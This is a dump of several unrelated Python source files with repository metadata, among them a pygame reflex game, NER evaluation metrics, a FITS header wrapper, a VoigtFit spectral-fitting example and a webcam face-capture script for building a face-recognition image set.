    table (reverse order of upgrade)."""
    ### commands auto generated by Alembic - please adjust! ###
    op.drop_column(u'messages', 'ctime')
    op.drop_table('archives')
    ### end Alembic commands ###
| 922 | 0 | 46 |
29f40798e34ed8bade7a6e4e67fca54f24b3f2fb | 403 | py | Python | find_num.py | sanchagrins/Python | aad28edb8fd338a8da30f515e8239b403c6902b0 | [
"MIT"
] | null | null | null | find_num.py | sanchagrins/Python | aad28edb8fd338a8da30f515e8239b403c6902b0 | [
"MIT"
] | null | null | null | find_num.py | sanchagrins/Python | aad28edb8fd338a8da30f515e8239b403c6902b0 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# Purpose: Exercise for Coursera Class Using Python to Access Web Data.
# Reads through a file, extracts numbers using regex and sums them.
import re
fh = open("regex_sum_320787.txt", 'r')
numlist = list()
for line in fh:
line = line.rstrip()
x = re.findall('[0-9]+', line)
if x:
x = [int(i) for i in x]
numlist.extend(x)
print sum(numlist)
| 25.1875 | 76 | 0.632754 | #!/usr/bin/env python
# Purpose: Exercise for Coursera Class Using Python to Access Web Data.
# Reads through a file, extracts numbers using regex and sums them.
import re
fh = open("regex_sum_320787.txt", 'r')
numlist = list()
for line in fh:
line = line.rstrip()
x = re.findall('[0-9]+', line)
if x:
x = [int(i) for i in x]
numlist.extend(x)
print sum(numlist)
| 0 | 0 | 0 |
a2725f355ef2b28067c0cff16fc47dcc673d222c | 7,418 | py | Python | Level3.py | MAXIORBOY/ReflexGame | 69d3c12f2a227cd948009f863fb5c16ce1c70256 | [
"MIT"
] | null | null | null | Level3.py | MAXIORBOY/ReflexGame | 69d3c12f2a227cd948009f863fb5c16ce1c70256 | [
"MIT"
] | null | null | null | Level3.py | MAXIORBOY/ReflexGame | 69d3c12f2a227cd948009f863fb5c16ce1c70256 | [
"MIT"
] | null | null | null | import random
from Items import *
pygame.init()
| 42.878613 | 263 | 0.630089 | import random
from Items import *
pygame.init()
class TerroristsAndCivilians:
    """Builds the full round schedule for level 3.

    Picks two random fruit sprites (one acts as the target "terrorist",
    the other as the decoy "civilian"), enumerates every
    (terrorists, civilians) count combination as one round, and precomputes
    the timing and grid placement of every round up front.
    """
    def __init__(self, window_width, window_height):
        """Set up sprites, the placement grid and the complete schedule."""
        self.targets = Sprites()
        self.grid = Grid(window_width, window_height, self.targets.sprite_dimension)
        self.terrorist, self.civilian = self.pick_fruit()
        self.current_index = 0
        # Bounds on how many targets/decoys a single round may contain.
        self.min_number_terrorists = 1
        self.max_number_terrorists = 3
        self.min_number_civilians = 0
        self.max_number_civilians = 3
        self.pre_defined_rounds = []
        self.build_pre_defined_rounds()
        # The pause between rounds (ms) is drawn from [min_interval,
        # max_interval); each round itself lasts round_time ms.
        self.min_interval = 500
        self.max_interval = 1500
        self.round_time = 2000
        self.round_intervals = []
        self.build_round_intervals()
        self.rounds = {}
        self.build_rounds()
        # Grammatical determiner per fruit, used in the instruction text.
        self.fruit_determiner = {'apple': 'every', 'bananas': 'all', 'grapes': 'all', 'lemon': 'every', 'orange': 'every', 'peach': 'every', 'pineapple': 'every', 'plum': 'every', 'watermelon': 'every'}
    def pick_fruit(self):
        """Return two distinct random sprite names (terrorist, civilian)."""
        samples = random.sample(self.targets.available_sprites, k=2)
        return samples[0], samples[1]
    def build_pre_defined_rounds(self):
        """Enumerate every (n_terrorists, n_civilians) pair once, shuffled."""
        for i in range(self.min_number_terrorists, self.max_number_terrorists + 1):
            for j in range(self.min_number_civilians, self.max_number_civilians + 1):
                self.pre_defined_rounds.append((i, j))
        random.shuffle(self.pre_defined_rounds)
    def build_round_intervals(self):
        """Draw one random inter-round pause (in ms) per scheduled round."""
        for _ in range(len(self.pre_defined_rounds)):
            self.round_intervals.append(int(random.random() * (self.max_interval - self.min_interval) + self.min_interval))
    def build_rounds(self):
        """Precompute the absolute timeline.

        rounds['times'] alternates pause-end / round-end timestamps (ms);
        rounds['grids'] holds, for each timestamp, a pair of position lists
        [terrorist_cells, civilian_cells] (an empty pair during pauses).
        """
        def split_list(list_to_split, len_first_part):
            # Split one list into [first len_first_part items, the rest].
            return [list_to_split[:len_first_part], list_to_split[len_first_part:]]
        total_time = 0
        times = []
        grids = []
        for i in range(len(self.round_intervals)):
            total_time += self.round_intervals[i]
            times.append(total_time)
            grids.append([[], []])
            total_time += self.round_time
            times.append(total_time)
            grids.append(split_list(random.sample(self.grid.grid, k=sum(self.pre_defined_rounds[i])), self.pre_defined_rounds[i][0]))
        self.rounds['times'] = times
        self.rounds['grids'] = grids
    def get_current_sprites_placement(self, clock_time):
        """Advance current_index to the schedule slot containing *clock_time*
        (ms since level start) and return its [terrorists, civilians] grids."""
        index = self.current_index
        while self.rounds['times'][index] < clock_time:
            if index + 1 < len(self.rounds['times']):
                index += 1
            else:
                break
        self.current_index = index
        return self.rounds['grids'][index]
class Fruit:
    """A single on-screen sprite, either a target ('terrorist') or a
    decoy ('civilian'), with its top-left position and square side length."""

    def __init__(self, sprite, kind, position, dimension):
        """Store the sprite surface, its role, its (x, y) corner and size."""
        self.sprite = sprite
        self.kind = kind
        self.x, self.y = position
        self.dimension = dimension

    def is_mouse_over(self, mouse_pos):
        """Return True iff *mouse_pos* lies strictly inside the sprite's square."""
        mouse_x = mouse_pos[0]
        mouse_y = mouse_pos[1]
        within_x = self.x < mouse_x < self.x + self.dimension
        within_y = self.y < mouse_y < self.y + self.dimension
        return within_x and within_y
class Level3:
    """Third game level: click every target fruit while avoiding the decoy.

    Drives the pygame event loop over the rounds scheduled by
    TerroristsAndCivilians and records timings/penalties in TimeMeasures.
    """
    def __init__(self, root, master_window):
        """Build all level state; *root* owns the pygame window and
        *master_window* is the controlling application window."""
        self.root = root
        self.master_window = master_window
        self.sounds = Sounds()
        self.terrorist_and_civilians = TerroristsAndCivilians(self.root.window_width, self.root.window_height)
        self.description = Description(self.root, ['Click at ' + self.terrorist_and_civilians.fruit_determiner[self.terrorist_and_civilians.terrorist] + ' ' + self.terrorist_and_civilians.terrorist, 'Do not click at any ' + self.terrorist_and_civilians.civilian])
        self.time_measures = TimeMeasures()
        self.results = Results(self.root, 3)
        self.backgrounds = Backgrounds()
        self.current_sprites = []
        self.current_round = -1
        # Stays True unless the player closes the window mid-level.
        self.status = True
    def prepare_round(self):
        """Rebuild current_sprites for the active schedule slot: first the
        terrorist (target) placements, then the civilian (decoy) ones."""
        self.current_sprites = []
        grids = self.terrorist_and_civilians.rounds['grids'][self.terrorist_and_civilians.current_index][0]
        for i in range(len(grids)):
            self.current_sprites.append(Fruit(self.terrorist_and_civilians.targets.sprites[self.terrorist_and_civilians.terrorist], 'terrorist', grids[i], self.terrorist_and_civilians.targets.sprite_dimension))
        grids = self.terrorist_and_civilians.rounds['grids'][self.terrorist_and_civilians.current_index][1]
        for i in range(len(grids)):
            self.current_sprites.append(Fruit(self.terrorist_and_civilians.targets.sprites[self.terrorist_and_civilians.civilian], 'civilian', grids[i], self.terrorist_and_civilians.targets.sprite_dimension))
    def draw_round(self):
        """Blit the background and every active sprite, then flip the display."""
        self.root.window.blit(self.backgrounds.background_levels, (0, 0))
        for fruit in self.current_sprites:
            self.root.window.blit(fruit.sprite, (fruit.x, fruit.y))
        pygame.display.update()
    def calculate_misses(self):
        """Count targets left unclicked in the round that just ended as
        strikes; if no target at all was hit, mark that round time as -1."""
        misses = 0
        for sprite in self.current_sprites:
            if sprite.kind == 'terrorist':
                self.time_measures.strikes += 1
                misses += 1
        if misses:
            self.sounds.miss_sound.play()
            if misses == len(self.terrorist_and_civilians.rounds['grids'][self.current_round][0]):
                self.time_measures.round_times[self.current_round] = -1
    def main_loop(self):
        """Run the timed event loop until the schedule ends or the window
        is closed, scoring clicks on targets and decoys."""
        loop_status = True
        start = pygame.time.get_ticks()
        while pygame.time.get_ticks() - start < self.terrorist_and_civilians.rounds['times'][-1] and loop_status:
            self.terrorist_and_civilians.get_current_sprites_placement(pygame.time.get_ticks() - start)
            # A new schedule slot began: score the old round, build the new one.
            if self.current_round != self.terrorist_and_civilians.current_index:
                self.calculate_misses()
                self.current_round = self.terrorist_and_civilians.current_index
                self.prepare_round()
            self.draw_round()
            for event in pygame.event.get():
                mouse_pos = pygame.mouse.get_pos()
                # NOTE(review): removing from current_sprites while iterating
                # it can skip the next sprite in this pass -- confirm this is
                # acceptable for a single mouse click.
                for current_sprite in self.current_sprites:
                    if current_sprite.is_mouse_over(mouse_pos) and event.type == pygame.MOUSEBUTTONDOWN:
                        self.current_sprites.remove(current_sprite)
                        if current_sprite.kind == 'terrorist':
                            stop = pygame.time.get_ticks()
                            self.sounds.correct_sound.play()
                            # Reaction time measured from the round's start.
                            self.time_measures.round_times[self.current_round] = stop - start - self.terrorist_and_civilians.rounds['times'][self.current_round - 1]
                        else:
                            self.sounds.wrong_sound.play()
                            self.time_measures.strikes += 1
                if event.type == pygame.QUIT:
                    self.status = False
                    loop_status = False
        self.calculate_misses()
    def run_level(self):
        """Show the instructions, play the level and display the results;
        shuts the master window down when any stage is aborted."""
        self.description.description_window()
        if self.description.status:
            self.main_loop()
            if self.status:
                self.time_measures.end_level_update()
                self.results.result_window(self.time_measures)
                if not self.results.status:
                    self.master_window.turn_off_master()
            else:
                self.master_window.turn_off_master()
        else:
            self.master_window.turn_off_master()
| 6,931 | -9 | 444 |
4f1567896d929471cf6007f360c8ea31880d6fe7 | 4,432 | py | Python | Chinese_NER/evaluate.py | fengyh3/Chinese_Resume_NER | 24d532d0d15d56860ef7857e3bbcca104f2eb938 | [
"MIT"
] | 11 | 2020-04-01T11:41:43.000Z | 2021-09-22T07:02:22.000Z | Chinese_NER/evaluate.py | fengyh3/Chinese_Resume_NER | 24d532d0d15d56860ef7857e3bbcca104f2eb938 | [
"MIT"
] | null | null | null | Chinese_NER/evaluate.py | fengyh3/Chinese_Resume_NER | 24d532d0d15d56860ef7857e3bbcca104f2eb938 | [
"MIT"
] | 1 | 2020-05-09T01:43:47.000Z | 2020-05-09T01:43:47.000Z | from collections import Counter
from utils import flatten_lists
| 39.571429 | 106 | 0.548962 | from collections import Counter
from utils import flatten_lists
class Metrics(object):
    """Per-tag precision/recall/F1 for sequence-labeling predictions.

    *golden_tags* and *predict_tags* are lists of per-sentence tag lists;
    both are flattened on construction. With remove_O=True, positions
    whose gold tag is 'O' are dropped before scoring.
    """
    def __init__(self, golden_tags, predict_tags, remove_O = True):
        # flatten_lists (from utils) collapses the per-sentence structure
        # into one flat tag sequence.
        self.golden_tags = flatten_lists(golden_tags)
        self.predict_tags = flatten_lists(predict_tags)
        if remove_O:
            self._remove_Otags()
        self.tagset = set(self.golden_tags)
        self.correct_tags_number = self.count_correct_tags()
        self.predict_tags_counter = Counter(self.predict_tags)
        self.golden_tags_counter = Counter(self.golden_tags)
        self.precision_scores = self.cal_precision()
        self.recall_scores = self.cal_recall()
        self.f1_scores = self.cal_f1()
    def count_correct_tags(self):
        """Return {tag: count} of positions where prediction equals gold."""
        correct_dict = {}
        for gold_tag, predict_tag in zip(self.golden_tags, self.predict_tags):
            if gold_tag == predict_tag:
                if gold_tag not in correct_dict:
                    correct_dict[gold_tag] = 1
                else:
                    correct_dict[gold_tag] += 1
        return correct_dict
    def cal_precision(self):
        """Return {tag: precision}.

        A tag that was never predicted gets its counter bumped to 1 to
        avoid a zero division (note: this mutates predict_tags_counter
        in place)."""
        precision_scores = {}
        for tag in self.tagset:
            if self.predict_tags_counter[tag] == 0:
                self.predict_tags_counter[tag] = 1
            precision_scores[tag] = self.correct_tags_number.get(tag, 0) / self.predict_tags_counter[tag]
        return precision_scores
    def cal_recall(self):
        """Return {tag: recall} over the gold tag counts."""
        recall_scores = {}
        for tag in self.tagset:
            recall_scores[tag] = self.correct_tags_number.get(tag, 0) / self.golden_tags_counter[tag]
        return recall_scores
    def cal_f1(self):
        """Return {tag: F1}; the 1e-10 epsilon guards against p + r == 0."""
        f1_scores = {}
        for tag in self.tagset:
            p, r = self.precision_scores[tag], self.recall_scores[tag]
            f1_scores[tag] = 2 * p * r / (p + r + 1e-10)
        return f1_scores
    def report_scores(self):
        """Print the scores as a table, like this:
                      precision    recall  f1-score   support
              B-LOC      0.775     0.757     0.766      1084
              I-LOC      0.601     0.631     0.616       325
             B-MISC      0.698     0.499     0.582       339
             I-MISC      0.644     0.567     0.603       557
              B-ORG      0.795     0.801     0.798      1400
              I-ORG      0.831     0.773     0.801      1104
              B-PER      0.812     0.876     0.843       735
              I-PER      0.873     0.931     0.901       634
          avg/total      0.779     0.764     0.770      6178
        """
        header_format = '{:>9s}  {:>9} {:>9} {:>9} {:>9}'
        header = ['precision', 'recall', 'f1-score', 'support']
        print(header_format.format('', *header))
        row_format = '{:>9s}  {:>9.4f} {:>9.4f} {:>9.4f} {:>9}'
        for tag in self.tagset:
            print(row_format.format(
                tag,
                self.precision_scores[tag],
                self.recall_scores[tag],
                self.f1_scores[tag],
                self.golden_tags_counter[tag]
            ))
        avg_metrics = self.cal_weighted_average()
        print(row_format.format(
            'avg/total',
            avg_metrics['precision'],
            avg_metrics['recall'],
            avg_metrics['f1_score'],
            len(self.golden_tags)
        ))
    def cal_weighted_average(self):
        """Return precision/recall/F1 averaged over tags, weighted by the
        gold support of each tag."""
        weighted_average = {}
        total = len(self.golden_tags)
        weighted_average['precision'] = 0.
        weighted_average['recall'] = 0.
        weighted_average['f1_score'] = 0.
        for tag in self.tagset:
            size = self.golden_tags_counter[tag]
            weighted_average['precision'] += self.precision_scores[tag] * size
            weighted_average['recall'] += self.recall_scores[tag] * size
            weighted_average['f1_score'] += self.f1_scores[tag] * size
        for metric in weighted_average.keys():
            weighted_average[metric] /= total
        return weighted_average
    def _remove_Otags(self):
        """Drop every position whose gold tag is 'O' from both sequences."""
        length = len(self.golden_tags)
        O_tag_indices = [i for i in range(length) if self.golden_tags[i] == 'O']
        self.golden_tags = [tag for i, tag in enumerate(self.golden_tags) if i not in O_tag_indices]
        self.predict_tags = [tag for i, tag in enumerate(self.predict_tags) if i not in O_tag_indices]
128e8e0bed81ee72905b7e8a2add5bee9df2df35 | 3,866 | py | Python | PyParadise/header.py | brandherd/PyParadise | 1c65bf634e17931f165fd88b9938f604b9371e2e | [
"MIT"
] | 1 | 2021-06-01T13:07:54.000Z | 2021-06-01T13:07:54.000Z | PyParadise/header.py | brandherd/PyParadise | 1c65bf634e17931f165fd88b9938f604b9371e2e | [
"MIT"
] | 3 | 2021-11-03T02:07:38.000Z | 2022-03-14T20:35:04.000Z | PyParadise/header.py | brandherd/PyParadise | 1c65bf634e17931f165fd88b9938f604b9371e2e | [
"MIT"
] | null | null | null | import astropy.io.fits as pyfits
| 33.327586 | 89 | 0.498189 | import astropy.io.fits as pyfits
class Header(object):
    """Thin wrapper around a pyfits/astropy FITS header plus the name of
    the FITS file it came from (its *origin*)."""
    def __init__(self, header=None, origin=None):
        """
        Creates a Header object

        Parameters
        --------------
        header : pyfits.header object, optional
            Fits header as header
        origin : string, optional
            Name of the Fits file as the origin for the header,
            can be the full path of the file
        """
        if header is not None:
            # Assign private variable and convert header to card list
            self._header = header
        else:
            # Create empty Header and CardList objects
            self._header = None
        # Set the Fits file origin of the header if given
        if origin is not None:
            self._origin = origin
        else:
            self._origin = None
    def setHeader(self, header, origin=None):
        """Replace the stored header (and, optionally, its file origin)."""
        self._header = header
        self._origin = origin
    def loadFitsHeader(self, filename, extension=0):
        """
        Loads the header information from a Fits file

        Parameters
        ---------------
        filename : string
            Filename of the Fits file from which the header should be loaded.
            The full path to the file can be given.
        extension : integer, optional
            Extension of the Fits file from the header shall be read
        """
        self._header = pyfits.getheader(filename, ext=extension)
        self._origin = filename
    def writeFitsHeader(self, filename=None, extension=0):
        """
        Writes the header to an existing Fits file

        Parameters:
        ---------------
        filename : string, optional
            Filename of the Fits file to which the header is written.
            The full path to the file can be given.
            If filename is none, the value of _origin ise used.
        extension : integer, optional
            Extension of the Fits file to which the header is written.
        """
        # Fall back to the file the header was loaded from.
        if filename is None:
            f_out = self._origin
        else:
            f_out = filename
        hdu = pyfits.open(f_out, mode='update')
        hdu[extension].header = self._header
        hdu[extension].update_header()
        hdu.flush()
    def getHdrValue(self, keyword):
        """
        Returns the value of a certain keyword in the header

        Parameters:
        ---------------
        keyword : string
            valid keyword in the header

        Returns:
        ---------------
        out : string, integer or float
            stored value in the header for the given keyword
        """
        return self._header[keyword]
    def getHdrKeys(self):
        """
        Returns all valid keywords of the Header

        Returns:
        ---------------
        out : list
            list of strings representing the keywords in the header
        """
        return self._header.keys()
    def getHeader(self):
        """Return the underlying pyfits header object (may be None)."""
        return self._header
    def setHdrValue(self, keyword, value, comment=None):
        """Set (or create) *keyword* in the header, creating an empty
        header first if none is stored yet; *comment* is attached to the
        card when given."""
        if self._header is None:
            self._header = pyfits.Header()
        if comment is None:
            try:
                # Header.update(keyword, value) works on some pyfits
                # versions; fall back to item assignment when it raises.
                self._header.update(keyword, value)
            except ValueError:
                self._header[keyword] = (value)
        else:
            try:
                self._header.update(keyword, value, comment)
            except ValueError:
                self._header[keyword] = (value, comment)
| 573 | 3,236 | 23 |
504fe8b4813d6970424712a3f23a2e0df3a783b4 | 1,012 | py | Python | model/game_model_proxy.py | PetrSpacek/angrylikegame-python-pyqt5 | 2ddc73fb5b4398117c3a83593632408b4b44e246 | [
"MIT"
] | 2 | 2020-01-17T10:43:13.000Z | 2021-11-21T14:56:53.000Z | model/game_model_proxy.py | PetrSpacek/angrylikegame-python-pyqt5 | 2ddc73fb5b4398117c3a83593632408b4b44e246 | [
"MIT"
] | null | null | null | model/game_model_proxy.py | PetrSpacek/angrylikegame-python-pyqt5 | 2ddc73fb5b4398117c3a83593632408b4b44e246 | [
"MIT"
] | null | null | null | from model.command import AbsCommand
from model.game_model import AbsGameModel
from model.game_object import GameObject
| 25.3 | 52 | 0.713439 | from model.command import AbsCommand
from model.game_model import AbsGameModel
from model.game_object import GameObject
class GameModelProxy(AbsGameModel):
    """Proxy that forwards every AbsGameModel operation to a wrapped model.

    Serves as an interception point (logging, access control, ...) without
    changing the real model or its callers; all calls are delegated 1:1 to
    ``self.subject``.
    """
    def __init__(self, subject: AbsGameModel):
        # The real model every call is delegated to.
        self.subject = subject
    def move_cannon_up(self):
        self.subject.move_cannon_up()
    def move_cannon_down(self):
        self.subject.move_cannon_down()
    def aim_cannon_up(self):
        self.subject.aim_cannon_up()
    def aim_cannon_down(self):
        self.subject.aim_cannon_down()
    def cannon_shoot(self):
        self.subject.cannon_shoot()
    def toggle_shooting_mode(self):
        self.subject.toggle_shooting_mode()
    def create_memento(self) -> object:
        # Memento pattern: returns a snapshot of the subject's state.
        return self.subject.create_memento()
    def restore_memento(self, memento):
        self.subject.restore_memento(memento)
    def register_command(self, command: AbsCommand):
        self.subject.register_command(command)
    def undo_last_command(self):
        self.subject.undo_last_command()
| 557 | 14 | 319 |
d745485ddfded67faabda3bdea895d1e8ceaa236 | 4,304 | py | Python | test_data/VoigtFit_example.py | jkrogager/VoigtFit | ca84ff4b9e6827e2ca64cd03c9437ab5d4097f1a | [
"MIT"
] | 21 | 2018-03-06T02:06:03.000Z | 2022-01-18T05:24:35.000Z | test_data/VoigtFit_example.py | jkrogager/VoigtFit | ca84ff4b9e6827e2ca64cd03c9437ab5d4097f1a | [
"MIT"
] | 21 | 2018-03-03T11:53:09.000Z | 2022-03-02T20:43:34.000Z | test_data/VoigtFit_example.py | jkrogager/VoigtFit | ca84ff4b9e6827e2ca64cd03c9437ab5d4097f1a | [
"MIT"
] | 9 | 2018-05-16T03:34:19.000Z | 2021-11-30T02:38:17.000Z | import numpy as np
import VoigtFit
### Fit DLA towards quasar Q1313+1441
### Observed in X-shooter P089.A-0068
z_DLA = 1.7941
logNHI = 21.3, 0.1 # value, uncertainty
# If log(NHI) is not known use:
#logNHI = None
#### Load UVB and VIS data:
UVB_fname = 'data/test_UVB_1d.spec'
res_UVB = 8000
VIS_fname = 'data/test_VIS_1d.spec'
res_VIS = 11800
wl_uvb, spec_uvb, err_uvb = np.loadtxt(UVB_fname, unpack=True)
wl_vis, spec_vis, err_vis = np.loadtxt(VIS_fname, unpack=True)
# Alternatively, load a FITS spectrum (either a FITS table or array):
# wl, flux, err, mask, header = VoigtFit.io.load_fits_spectrum(fname)
dataset = VoigtFit.DataSet(z_DLA)
dataset.add_data(wl_uvb, spec_uvb, 299792./res_UVB, err=err_uvb, normalized=False)
dataset.add_data(wl_vis, spec_vis, 299792./res_VIS, err=err_vis, normalized=False)
### Define absorption lines:
dataset.add_line('FeII_2374')
dataset.add_line('FeII_2260')
dataset.add_line('CrII_2056')
dataset.add_line('CrII_2066')
dataset.add_line('CrII_2026')
dataset.add_line('ZnII_2026')
dataset.add_line('MgI_2026')
dataset.add_line('MgI_2852')
### If a line has been defined, and you don't want to fit it
### it can either be removed from the dataset completely:
#dataset.remove_line('CrII_2056')
### or deactivated:
#dataset.deactivate_line('FeII_2374')
### A deactivated line is still present in the dataset,
### but not included in the fit. The line may still show up in the final figure.
### Define components to fit:
# dataset.reset_components()
### Add velocity components for each ion:
# ion z b logN
dataset.add_component('FeII', 1.793532, 20, 14.3, var_z=1)
dataset.add_component('FeII', 1.794060, 20, 15.0, var_z=1)
dataset.add_component('FeII', 1.794282, 20, 14.3, var_z=1)
dataset.add_component('FeII', 1.794722, 20, 14.3, var_z=1)
dataset.add_component('FeII', 1.795121, 15, 14.5, var_z=1, var_b=1)
#
# Options for the components:
# var_z=1/0 vary redshift for this component
# var_b=1/0 vary b-parameter for this component
# var_N=1/0 vary column density for this component
#
# Redshift and b-parameters can be tied.
# passing the option 'tie_z=z0_FeII' ties the redshift to the first component of FeII
# passing the option 'tie_b=b2_SiII' ties the b-parameter to the third component of SiII
#
# NOTE - the ion must be defined and the component index starts with 0
#
# The entire velocity structure can be copied from one ion to another:
dataset.copy_components(from_ion='FeII', to_ion='ZnII', logN=12.9, ref_comp=1)
# This copies the five components defined for FeII to ZnII and keeps
# the same pattern of initial guesses for column density.
# By giving ref_comp and logN, this intial guess pattern is scaled such
# that the second component has logN=12.9
#
# Individual components which are not observed for weaker lines can be removed:
#dataset.delete_component('ZnII', 4) # the index '4' refers to the fifth component
#dataset.delete_component('ZnII', 3)
#dataset.delete_component('ZnII', 2)
#dataset.delete_component('ZnII', 1)
#dataset.delete_component('ZnII', 0)
# NOTE - components should be deleted from last component to first component
# not the other way around as that messes up the component numbering.
dataset.copy_components(to_ion='CrII', from_ion='FeII', logN=13.6, ref_comp=1)
dataset.copy_components(to_ion='MgI', from_ion='FeII', logN=12.4, ref_comp=1)
# Crucial step:
dataset.prepare_dataset()
# Run the fit:
popt, chi2 = dataset.fit()
# Output best-fit parameters, total column densities and make plot:
dataset.plot_fit()
if logNHI:
dataset.print_metallicity(*logNHI)
dataset.print_total()
### The best-fit parameters can be accessed from the .best_fit attribute:
#logN0 = dataset.best_fit['logN0_FeII'].value
#logN0_err = dataset.best_fit['logN0_FeII'].stderr
#b1 = dataset.best_fit['b1_FeII'].value
#b1_err = dataset.best_fit['b1_FeII'].stderr
# Or you can create a list of all values:
#logN_FeII = [dataset.best_fit['logN%i_FeII' % num].value for num in range(len(dataset.components['FeII']))]
#logN_err_FeII = [dataset.best_fit['logN%i_FeII' % num].stderr for num in range(len(dataset.components['FeII']))]
dataset.save('example_fit.hdf5')
### The dataset which was defined above can be loaded like this:
# dataset = VoigtFit.load_dataset('example_fit.hdf5')
| 36.168067 | 113 | 0.745818 | import numpy as np
import VoigtFit
### Fit DLA towards quasar Q1313+1441
### Observed in X-shooter P089.A-0068
z_DLA = 1.7941
logNHI = 21.3, 0.1 # value, uncertainty
# If log(NHI) is not known use:
#logNHI = None
#### Load UVB and VIS data:
UVB_fname = 'data/test_UVB_1d.spec'
res_UVB = 8000
VIS_fname = 'data/test_VIS_1d.spec'
res_VIS = 11800
wl_uvb, spec_uvb, err_uvb = np.loadtxt(UVB_fname, unpack=True)
wl_vis, spec_vis, err_vis = np.loadtxt(VIS_fname, unpack=True)
# Alternatively, load a FITS spectrum (either a FITS table or array):
# wl, flux, err, mask, header = VoigtFit.io.load_fits_spectrum(fname)
dataset = VoigtFit.DataSet(z_DLA)
# 299792 (speed of light, km/s) divided by the resolving power R gives the
# spectral resolution in velocity units expected by add_data.
dataset.add_data(wl_uvb, spec_uvb, 299792./res_UVB, err=err_uvb, normalized=False)
dataset.add_data(wl_vis, spec_vis, 299792./res_VIS, err=err_vis, normalized=False)
### Define absorption lines:
dataset.add_line('FeII_2374')
dataset.add_line('FeII_2260')
dataset.add_line('CrII_2056')
dataset.add_line('CrII_2066')
dataset.add_line('CrII_2026')
dataset.add_line('ZnII_2026')
dataset.add_line('MgI_2026')
dataset.add_line('MgI_2852')
### If a line has been defined, and you don't want to fit it
### it can either be removed from the dataset completely:
#dataset.remove_line('CrII_2056')
### or deactivated:
#dataset.deactivate_line('FeII_2374')
### A deactivated line is still present in the dataset,
### but not included in the fit. The line may still show up in the final figure.
### Define components to fit:
# dataset.reset_components()
### Add velocity components for each ion:
#                 ion  z      b   logN
dataset.add_component('FeII', 1.793532, 20, 14.3, var_z=1)
dataset.add_component('FeII', 1.794060, 20, 15.0, var_z=1)
dataset.add_component('FeII', 1.794282, 20, 14.3, var_z=1)
dataset.add_component('FeII', 1.794722, 20, 14.3, var_z=1)
dataset.add_component('FeII', 1.795121, 15, 14.5, var_z=1, var_b=1)
#
# Options for the components:
# var_z=1/0 vary redshift for this component
# var_b=1/0 vary b-parameter for this component
# var_N=1/0 vary column density for this component
#
# Redshift and b-parameters can be tied.
# passing the option 'tie_z=z0_FeII' ties the redshift to the first component of FeII
# passing the option 'tie_b=b2_SiII' ties the b-parameter to the third component of SiII
#
# NOTE - the ion must be defined and the component index starts with 0
#
# The entire velocity structure can be copied from one ion to another:
dataset.copy_components(from_ion='FeII', to_ion='ZnII', logN=12.9, ref_comp=1)
# This copies the five components defined for FeII to ZnII and keeps
# the same pattern of initial guesses for column density.
# By giving ref_comp and logN, this initial guess pattern is scaled such
# that the second component has logN=12.9
#
# Individual components which are not observed for weaker lines can be removed:
#dataset.delete_component('ZnII', 4) # the index '4' refers to the fifth component
#dataset.delete_component('ZnII', 3)
#dataset.delete_component('ZnII', 2)
#dataset.delete_component('ZnII', 1)
#dataset.delete_component('ZnII', 0)
# NOTE - components should be deleted from last component to first component
# not the other way around as that messes up the component numbering.
dataset.copy_components(to_ion='CrII', from_ion='FeII', logN=13.6, ref_comp=1)
dataset.copy_components(to_ion='MgI', from_ion='FeII', logN=12.4, ref_comp=1)
# Crucial step:
dataset.prepare_dataset()
# Run the fit:
popt, chi2 = dataset.fit()
# Output best-fit parameters, total column densities and make plot:
dataset.plot_fit()
if logNHI:
    dataset.print_metallicity(*logNHI)
dataset.print_total()
### The best-fit parameters can be accessed from the .best_fit attribute:
#logN0 = dataset.best_fit['logN0_FeII'].value
#logN0_err = dataset.best_fit['logN0_FeII'].stderr
#b1 = dataset.best_fit['b1_FeII'].value
#b1_err = dataset.best_fit['b1_FeII'].stderr
# Or you can create a list of all values:
#logN_FeII = [dataset.best_fit['logN%i_FeII' % num].value for num in range(len(dataset.components['FeII']))]
#logN_err_FeII = [dataset.best_fit['logN%i_FeII' % num].stderr for num in range(len(dataset.components['FeII']))]
dataset.save('example_fit.hdf5')
### The dataset which was defined above can be loaded like this:
# dataset = VoigtFit.load_dataset('example_fit.hdf5')
| 0 | 0 | 0 |
f6f7df60b9e4598c503b7ba14cfaa26f0c4b5828 | 1,098 | py | Python | add_person.py | tomasrasymas/face-recognition-python | 52da6697fb775cfcd0a7e1511b356f6fd9908678 | [
"MIT"
] | null | null | null | add_person.py | tomasrasymas/face-recognition-python | 52da6697fb775cfcd0a7e1511b356f6fd9908678 | [
"MIT"
] | null | null | null | add_person.py | tomasrasymas/face-recognition-python | 52da6697fb775cfcd0a7e1511b356f6fd9908678 | [
"MIT"
] | null | null | null | import os
import cv2
import face_detector
import config
if __name__ == '__main__':
camera = cv2.VideoCapture(0)
cv2.namedWindow("preview")
person_name = input('Person name: ').lower()
person_folder = os.path.join(config.original_images_path, person_name)
if not os.path.exists(person_folder):
os.mkdir(person_folder)
counter = 0
timer = 0
while counter < config.number_of_faces and camera.isOpened():
ret, frame = camera.read()
faces = face_detector.detect_faces_dlib(frame)
if len(faces):
face = faces[0]
if timer % 200 == 50:
cv2.imwrite(os.path.join(person_folder, '%s.jpg' % counter), frame)
counter += 1
face_detector.draw_text(frame, face, str(counter))
face_detector.draw_rectangle(frame, face)
cv2.imshow('Camera image', frame)
if cv2.waitKey(20) & 0xFF == 27:
break
timer += 50
camera.release()
cv2.destroyAllWindows() | 24.954545 | 87 | 0.571949 | import os
import cv2
import face_detector
import config
if __name__ == '__main__':
    # Capture frames from the default webcam (device index 0).
    camera = cv2.VideoCapture(0)
    cv2.namedWindow("preview")
    person_name = input('Person name: ').lower()
    # Each person gets their own sub-folder under the configured originals path.
    person_folder = os.path.join(config.original_images_path, person_name)
    if not os.path.exists(person_folder):
        os.mkdir(person_folder)
    # counter: images saved so far; timer: advances by 50 per captured frame.
    counter = 0
    timer = 0
    while counter < config.number_of_faces and camera.isOpened():
        ret, frame = camera.read()
        faces = face_detector.detect_faces_dlib(frame)
        if len(faces):
            # Only the first detected face is annotated.
            face = faces[0]
            # timer % 200 == 50 holds once every 4 frames, so at most one
            # snapshot is written per 4 frames while a face is visible.
            if timer % 200 == 50:
                cv2.imwrite(os.path.join(person_folder, '%s.jpg' % counter), frame)
                counter += 1
            face_detector.draw_text(frame, face, str(counter))
            face_detector.draw_rectangle(frame, face)
        cv2.imshow('Camera image', frame)
        # 27 == ESC key: abort capture early.
        if cv2.waitKey(20) & 0xFF == 27:
            break
        timer += 50
    camera.release()
cv2.destroyAllWindows() | 0 | 0 | 0 |
